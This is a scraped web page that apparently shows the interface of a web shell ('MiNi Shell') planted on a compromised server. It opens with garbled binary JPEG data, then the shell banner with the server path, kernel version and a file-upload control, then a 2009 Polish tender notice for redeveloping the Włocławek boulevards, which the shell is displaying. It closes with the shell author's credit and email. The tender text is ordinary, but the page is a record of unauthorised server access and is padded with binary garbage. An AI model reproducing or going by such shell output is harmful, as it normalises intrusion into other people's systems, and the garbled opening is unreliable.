JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/343748-N-2009.html

<p class="kh_header"><b>Włocławek: Lokalny Program Rewitalizacji Włocławka - Zagospodarowanie Włocławskich Bulwarów</b><br>
<b>Numer ogłoszenia: 343748 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent  Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4144000, faks 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Lokalny Program Rewitalizacji Włocławka - Zagospodarowanie Włocławskich Bulwarów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych i urządzenie zieleni w ramach realizacji zadania pn. Lokalny Program Rewitalizacji Włocławka - Zagospodarowanie Włocławskich Bulwarów. 

1.	Ogólne właściwości 

1)	Cel inwestycji - stworzenie   reprezentacyjnego   obszaru   o   wysokich    standardach  w  centrum  miasta o bardziej niż obecnie zaakcentowanej funkcji rekreacji aktywnej bulwarów. Priorytetem jest wprowadzenie urozmaiconego programu wypoczynkowo - edukacyjnego, dostosowanego do różnych grup wiekowych i zróżnicowanych zainteresowań. Przedsięwzięcie zakłada podniesienie standardu użytkowego terenu w zakresie nawierzchni, małej architektury, oświetlenia i szaty roślinnej.

2)	Lokalizacja - inwestycja obejmuje teren nieruchomości położonych w śródmieściu Włocławka, oznaczonych numerami działek: 82,  89-1, 38, 88, 86, 83, k.m. 47, oraz działek: 102, 108, 107, 106-1, 105-1, 104-1, 103, k.m. 46, o łącznej powierzchni 4,30 ha. Powyższe działki stanowią własność Gminy Miasta Włocławek.

2.	Zakres zamierzenia obejmuje:

- roboty rozbiórkowe polegające m. in. na demontażu elementów małej architektury (ławki i śmietniki) oraz elementów pozostałości po lampach oświetleniowych, polbruku, schodów oraz pochylni,
-	budowę głównego ciągu komunikacyjno - spacerowego (promenady) wzdłuż Bulwarów im. Marszałka Józefa Piłsudskiego (od ul. Ogniowej do ujścia rzeki Zgłowiączki) z zastosowaniem elementów ozdobnych nawierzchni,
-	budowę ścieżek spacerowych z lokalizacją ławek pomiędzy promenadą a chodnikiem Bulwarów,
-	budowę oświetlenia promenady spacerowej i całych Bulwarów z podkreśleniem elementów małej architektury i wyeksponowaniem elementów ozdobnych,
-	budowę wielostanowiskowego parkingu w okolicy ul. Ogniowej, 
-	montaż siedzisk na odcinku Bulwarów pomiędzy ul. Bechiego i Towarową, 
-	urządzenie placu zabaw dla dzieci z atestowanymi urządzeniami i polami piaskowymi, 
-	urządzenie placu interaktywnego w rejonie ul. Bechiego oraz pomiędzy ul. Św. Jana i Maślaną, wyposażonego w siedziska i małą scenę,
-	 placu umożliwiającego organizowanie imprez plenerowych, 
-	odbudowę bariery ochronnej jako repliki istniejących historycznie barier od strony ulicy Bulwary,
-	wykonanie układu alejek i zieleńców w okolicy Pałacu Biskupiego do ujścia rzeki Zgłowiączki, maskujących przepompownię ścieków, przy jednoczesnym wykorzystaniu istniejącej drogi dojazdowej do przepompowni jako elementu ciągu spacerowego, prowadzącego w kierunku północnym i południowym, kończącego się na dolnym poziomie bulwarów,
-	wyposażenie ciągu Bulwarów w szalety publiczne zlokalizowane pod mostem stalowym na Wiśle oraz w okolicach ul. Bechiego, 
-	przebudowę i budowę koniecznych sieci i przyłączy infrastruktury technicznej: wodno - kanalizacyjnej i elektroenergetycznej,
-	budowę placu manewrowego dla punktu czerpania wody p - poż. w rejonie skrzyżowania ul. Ogniowej i Bulwarów,
-	wykonanie szaty roślinnej.

3.	Szczegółowy opis projektu:

-	wykonanie ciągu komunikacyjno - spacerowego (promenady) wzdłuż Bulwarów im. Marszałka Józefa Piłsudskiego, w tym ciągu pieszego o długości 1337,54 m  i szerokości zmiennej od 2,5 do 5,0 m  oraz ścieżki rowerowej dwukierunkowej o długości 1279,85 m i szerokości 2,5 m (od ul. Ogniowej do ujścia rzeki Zgłowiączki) z zastosowaniem elementów ozdobnych nawierzchni, w tym: 13 tarasów widokowych w kształcie koła tworzących strefy wypoczynku, zabawy i wyznaczających przestrzenie małych gastronomii. Poziom posadowienia tarasów winien być równy z poziomem istniejącego chodnika. Istniejącą różnicę  należy zniwelować  poprzez zastosowanie ścianek oporowych. Ścianki te wyznaczają przestrzenie kół, jak również podjazdy dla osób niepełnosprawnych i strefy schodów. Powierzchnia ciągu pieszego wykończona zostanie kostką granitową. W przestrzeniach kół oraz na podjazdach dla osób niepełnosprawnych, a także na pozostałych ciągach pieszych (ciągi spacerowe pomiędzy promenadą a chodnikiem) zastosowana będzie kostka betonowa. Dodatkowo cały ciąg pieszo - jezdny promenady rozświetlony będzie poprzez lampy stojące z oświetleniem pośrednim (odbitym).  
-	planowane przestrzenie do zabawy wydzielone zostaną poprzez palisadę drewnianą wkopaną w ziemię na głębokość 40cm i wystającą ponad teren na 20cm. 
-	projektowane kamienne siedziska pełnić będą również funkcję stopni. Schody boczne wykonane zostaną z kostki granitowej
-	 scena - usytuowana będzie pomiędzy 6 i 7 kręgiem.  Ze względów bezpieczeństwa zaprojektowano przegrody szklane ze szkła hartowanego klejonego 2x8mm o wymiarach 150x100 cm z wysunięciem 110 cm nad scenę i 4 folie z reflexem zielonym. 
-	barierki - w pozostałych miejscach występowania poprzednich barierek do h=110 cm zastosowane zostaną barierki z kwasówki. Z uwagi, iż istniejące murki oporowe wykończone piaskowcem są w złym stanie technicznym, zostanie uzupełniony piaskowiec, a następnie wykonane czapki betonowe z kapinosami w kolorze zbliżonym do powłoki murków. Dodatkowo wszystkie murki będą oczyszczone z brudu i graffiti i zabezpieczone  zagruntowaniem środkami chemicznymi anty - graffiti.  Na długości całych bulwarów zostanie odtworzona balustrada żeliwna wraz z wypełnieniem w rozstawie ok. 300cm.
-	w ramach projektowanej małej architektury przewidziane są:
-   ławki - 231 sztuk (wymiary: 160x40x44),
-   kosze na śmieci - 33 sztuki,
-   stojaki rowerowe - 27 sztuk,
-   latarnie -  27  sztuk,
                  -   urządzenia stanowiące wyposażenie placów zabaw typu: stoły do gry, piramida
                  - wspinaczkowa, huśtawka, ruchomy pomost, karuzela słupowa, orkiestra    podwórkowa, itp.  
Poszczególne elementy małej architektury będą mocowane do podłoża za pomocą fundamentów betonowych B20 i mocowane do nich poprzez systemowe łączniki. Wszystkie elementy małej architektury będą posiadać obowiązujące przepisami atesty i certyfikaty. 
-	małe gastronomie - urządzenie 286,5 m2 powierzchni wydzielonych na małe gastronomie poprzez doprowadzenie w w/w miejsca wszelkie media, takie jak: woda, kanalizacja i energia elektryczna. (zgodnie z projektami branżowymi). 
-	wyposażenie wskazanych miejsc (okolice mostu stalowego i ul. Bechiego) w  dwa szalety miejskie typu przenośnego. Szalety osłonięte będą poprzez ścianki oporowe (o zaokrąglonych bokach i gr. 15 cm) o wymiarach od 60 do 200cm wraz z oświetleniem LED .
-	parking - budowa 30-sto stanowiskowego parkingu (w tym 3 stanowiska dla osób niepełnosprawnych) w rejonie skrzyżowania ul Ogniowej i ul. Bulwary im. J. Piłsudskiego. Wykonanie nowego wjazdu od ul. Bulwary im. J. Piłsudskiego
-	zieleń - urządzenie zieleni ozdobnej wraz z częściową adaptacją istniejącego drzewostanu. Głównym zadaniem będzie nasadzenie dodatkowej roślinności w celu wzbogacenia i podkreślenia walorów przyrodniczych włocławskich bulwarów. 
 Spis projektowanych roślin: Złotokakap Waterera, Bukszpan Wiecznieziolony, Róża    Okrywowa, Irga Błyszcząca, Magnolia Susan.

4.	Bilans elementów powierzchni:

-	jezdnia  - 862,0 m2 (brukowiec z kamienia obrobionego 16-20 cm, podsypka cementowo - piaskowa gr.5 cm, podbudowa z betonu cementowego C12/15 gr.20 cm, warstwa odsączająca z piasku gr. 20 cm, profilowane i zagęszczone podłoże gruntowe)

-	jezdnia manewrowa   - 370.0 m2  (kostka brukowa betonowa koloru szarego gr.8 cm, podsypka cementowo - piaskowa gr.3 cm, podbudowa z betonu cementowego C12/15 gr.20 cm, warstwa odsączająca z piasku gr. 20 cm, profilowane i zagęszczone podłoże gruntowe)

-	stanowisko poboru wody - droga pożarowa 508,0 m2 (kostka brukowa betonowa koloru czerwonego gr. 8 cm, podsypka cementowo - piaskowa gr.3 cm, podbudowa z betonu cementowego C12/15 gr.20 cm, warstwa odsączająca z piasku gr. 20 cm, profilowane i zagęszczone podłoże gruntowe)

-	parking - 365,0 m2 (kostka brukowa betonowa koloru grafitowego gr.8 cm, podsypka cementowo - piaskowa gr.3 cm, podbudowa z betonu cementowego C12/15 gr.20 cm, warstwa odsączająca z piasku gr. 20 cm, profilowane i zagęszczone podłoże gruntowe)
 
-	ciąg pieszy -  4480,20 m2 - (kostka brukowa betonowa kolorowa o gr. 8 cm, podsypka cementowo - piaskowa gr.3 cm, istniejąca nawierzchnia betonowa)

-	ścieżka rowerowa - 3082,5 m2 (kostka brukowa betonowa koloru czerwonego                o gr. 8 cm, podsypka cementowo - piaskowa gr.3 cm, istniejąca nawierzchnia betonowa)

-	skarpa umocniona płytami ażurowymi - 247,6 m2

-	zieleń - 60,1 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.65.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 100000,00 zł - wadium wnosi się na etapie składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca winien:
1)	zrealizować w okresie ostatnich pięciu lat od dnia wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dwie roboty odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania o wartości min. 5.000.000,00 PLN brutto każda - obejmujące zakresem budowę terenów zielonych z ciągami spacerowymi - znaczenie 60%
Fakt realizacji musi zostać poświadczony dokumentami potwierdzającymi, że roboty te zostały wykonane należycie
- Sposób oceny: za każdą następną robotę budowlaną spełniającą powyższy warunek 20 pkt. (max 60 pkt);

2)	Kadra:
2.1	dysponować lub będzie dysponować minimum po jednej osobie z odpowiednimi uprawnieniami, (art. 12 ustawy - Prawo budowlane z dnia 7 lipca 1994 r. / tekst jednolity Dz. U. z 2006r. nr 156, poz. 1118, z późn. zm) + wpis na listę członków właściwej izby, do obsadzenia następujących stanowisk:
         - kierownika budowy, który powinien posiadać uprawnienia konstrukcyjno -   budowlane do kierowania robotami budowlanymi; 
	- kierownika robót instalacyjnych, który powinien posiadać uprawnienia w 	specjalności 	instalacji w zakresie sieci, instalacji i urządzeń cieplnych, 	wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
	- kierownika robót elektrycznych, który powinien posiadać uprawnienia w 	specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 	elektroenergetycznych.
  -  kierownik robót drogowych, który powinien posiadać uprawnienia budowlane w specjalności drogowej
2.2 dysponować osobą uprawnioną do wykonywania praz z zakresu urządzania terenów zielonych posiadającą wykształcenie wyższe lub średnie ogrodnicze.


3)	posiadać aktualną polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na min. 5.000.000,00 zł., - znaczenie 10% 
-Sposób oceny: za każde następne 5 mln zł  - 5 pkt. (max 10 pkt); 

4)	posiadać przychód ze sprzedaży towarów i usług za ostatni rok obrotowy w wysokości nie mniejszej niż 10.000.000,00 zł. - znaczenie 15%
     - Sposób oceny: za każde następne 10 mln zł przychodu - 5 pkt. (max 15 pkt); 

5)	dysponować środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 2.000.000,00 zł. - znaczenie 15% 
    - Sposób oceny: za każde następne 2 mln zł - 5 pkt. (max 15 pkt);.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wniosek winien zawierać następujące dokumenty: 1. wniosek; 2. oświadczenie w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych; 3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,wystawione nie wcześniej niż 6 miesięcy przed upływem terminu wyznaczonego na termin składania wniosków - oryginał lub kopia poświadczona przez Wykonawcę; 4. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków oraz opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,wystawione nie wcześniej niż 3 miesiące przed upływem terminu wyznaczonego na składanie wniosków - oryginał lub kopia poświadczona przez Wykonawce; 5. aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych, potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,wystawione nie wcześniej niż 3 miesiące przed upływem terminu wyznaczonego na składanie wniosków - oryginał lub kopia poświadczona przez Wykonawce; 6. aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy (w odniesieniu do osób prawnych - dotyczy wszystkich urzędujących członków władz),wystawione nie wcześniej niż 6 miesięcy przed upływem terminu wyznaczonego na składanie wniosków - oryginał lub kopia poświadczona przez Wykonawce; 7. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy,wystawione nie wcześniej niż 6 miesięcy przed upływem terminu wyznaczonego na składanie wniosków - oryginał lub kopia poświadczona przez Wykonawce; 8. wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania; 9. dokumenty potwierdzające, że roboty zostały wykonane należycie - oryginał lub kopia poświadczona przez Wykonawcę 10. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; 11. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt 10 wykonawca wskazał osoby, którymi będzie dysponował - oryginał lub kopia poświadczona przez Wykonawcę; 12. dokumenty stwierdzające, że z osoby pełniące samodzielne funkcje techniczne w budownictwie (art. 12 ustawy - Prawo budowlane z dnia 7 lipca 1994 r. / tekst jednolity Dz. U. z 2006r. nr 156, poz. 1118, z późn. zm), wykonujące zamówienie, posiadają właściwe uprawnienia budowlane - oryginał lub kopia poświadczona przez Wykonawcę; 13. zaświadczenie wydane przez właściwą izbę samorządu zawodowego, że z osoby pełniące samodzielne funkcje techniczne w budownictwie (art. 12 ustawy - Prawo budowlane z dnia 7 lipca 1994 r. / tekst jednolity Dz. U. z 2006r. nr 156, poz. 1118, z późn. zm), wykonujące zamówienie, są wpisane na listę członków tej izby- oryginał lub kopia poświadczona przez Wykonawcę; 14. polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - oryginał lub kopia poświadczona przez Wykonawcę; 15. część sprawozdania finansowego obejmującą bilans oraz rachunek zysków i strat, a jeżeli podlega ono badaniu przez biegłego rewidenta, zgodnie z przepisami o rachunkowości, również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określających obroty oraz zobowiązania i należności - za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - oryginał lub kopia poświadczona przez Wykonawcę; 16. informacje banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu wyznaczonego na składanie wniosków- oryginał lub kopia poświadczona przez Wykonawcę; 17. pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrębnych dokumentów, np. z odpisu z rejestru, w formie wynikającej z kodeksu cywilnego. 18. W przypadku wniosku składanego przez wykonawców wspólnie ubiegających się o zamówienie - dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego w ich imieniu. UWAGA - Spełnienie warunków udziału w postępowaniu oceniane będą łącznie dla wszystkich podmiotów występujących wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek, Wydział Inwestycji i Zamówień Publicznych, Zielony Rynek 11/13 87-800 Włocławek..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 14:30, miejsce: Urząd Miasta Włocławek, Zielony Rynek 11/13 - Biuro Obsługi Mieszkańców - hol budynku A - stanowisko d/s obsługi kancelaryjnej Prezydenta Miasta Włocławek..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com